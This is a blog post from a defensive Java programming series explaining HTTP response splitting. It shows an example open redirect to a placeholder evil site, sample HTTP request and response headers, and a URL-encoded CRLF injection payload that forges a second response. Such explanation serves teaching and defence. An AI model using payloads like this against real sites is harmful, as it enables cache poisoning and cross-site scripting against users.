Defensive Java Programming Notes (07 of 11) HTTP Response Splitting

  • strict warning: Non-static method view::load() should not be called statically in /hermes/walnaweb12a/b57/moo.greydragoncom/nodsw/sites/all/modules/views/views.module on line 906.
  • strict warning: Declaration of views_handler_argument::init() should be compatible with views_handler::init(&$view, $options) in /hermes/walnaweb12a/b57/moo.greydragoncom/nodsw/sites/all/modules/views/handlers/views_handler_argument.inc on line 744.
  • strict warning: Declaration of views_handler_filter::options_validate() should be compatible with views_handler::options_validate($form, &$form_state) in /hermes/walnaweb12a/b57/moo.greydragoncom/nodsw/sites/all/modules/views/handlers/views_handler_filter.inc on line 607.
  • strict warning: Declaration of views_handler_filter::options_submit() should be compatible with views_handler::options_submit($form, &$form_state) in /hermes/walnaweb12a/b57/moo.greydragoncom/nodsw/sites/all/modules/views/handlers/views_handler_filter.inc on line 607.
  • strict warning: Declaration of views_handler_filter_boolean_operator::value_validate() should be compatible with views_handler_filter::value_validate($form, &$form_state) in /hermes/walnaweb12a/b57/moo.greydragoncom/nodsw/sites/all/modules/views/handlers/views_handler_filter_boolean_operator.inc on line 159.
Leeland's picture

This is where an attacker is able to convince the browser that there where actually two HTTP responses and the browser thinks the second response is the body, which would be completely controlled by the attacker.

Example:

http://paradox.org/~attacker/redirect.php?page=http://www.evilSite.org

Would direct the user's browser to http://www.evilSite.org

Typically this is used to do other kinds of attacks like:

  • Cross-Site Scripting
  • Web cache poisoning
  • Hijacking pages with user-specific information
  • Browser cache poisoning

Frankly this one is a bit odd to fully grasp (at least for me). This attack by itself is not considered a major threat. But since this attack lends a helping hand to performing the more dangerous attacks it must be guarded against.

Another clever way at this attack is like this. A typical GET request will look like this:

GET /~attacker/redirect.php?page=http://www.evilSite.org HTTP/1.1\r\n
Host: icis.digitalparadox.org\r\n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2\r\n
Accept: text/xml,application/xml,application/xhtml xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n

Note the use of the \r\n?

The response to this might look like this:

HTTP/1.1 302 Found\r\n
Date: Tue, 12 Apr 2005 21:00:28 GMT\r\n
Server: Apache/1.3.29 (Unix) mod_ssl/2.8.16 OpenSSL/0.9.7c\r\n
Location: http://www.digitalparadox.org\r\n
Keep-Alive: timeout=15, max=100\r\n
Connection: Keep-Alive\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/html\r\n
\r\n

The redirect did the correct thing and now the browser is getting back the directive BUT with the URL from the request in the Location header field.

So all that is needed is to inject some extra carriage return-line feeds with an additional bit of content. The HTTP encoding for \r\n is %0d%0a. An attacker can embed the following in place of the redirection location:

%0d%0a
Content-Type:%20text/html%0d%0a%20
HTTP/1.1%20200%20OK%0d%0a
Content-Type:%20text/html%0d%0a
%0d%0a
%3chtml%3e%3cfont%20color=red%3e%20hey%3c/font%3e%3c/html%3e

Which will get translated to (I added some returns just for formatting):

GET%20/~attacker/redirect.php?page=%0d%0aContent-Type:%20
text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:
%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont%20color=red%3Ehey
%3C/font%3E%3C/html%3E HTTP/1.1\r\n
Host: icis.digitalparadox.org\r\n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2\r\n
Accept: text/xml,application/xml,application/xhtml xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n

When the browser gets a response back with the injected URL and the HTML encoding it will decode the response before acting on it (this is normal and needed). Which means that the browser will see this:

HTTP/1.1 302 Found
Date: Tue, 12 Apr 2005 22:09:07 GMT
Server: Apache/1.3.29 (Unix) mod_ssl/2.8.16 OpenSSL/0.9.7c
Location:
Content-Type: text/html
HTTP/1.1 200 OK
Content-Type: text/html

<html><font color=red>hey</font></html>
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

Which is not dangerous but if this is done to inject a cross site scripting attack then almost anything could be done to the victim.

Thread Slivers eBook at Amazon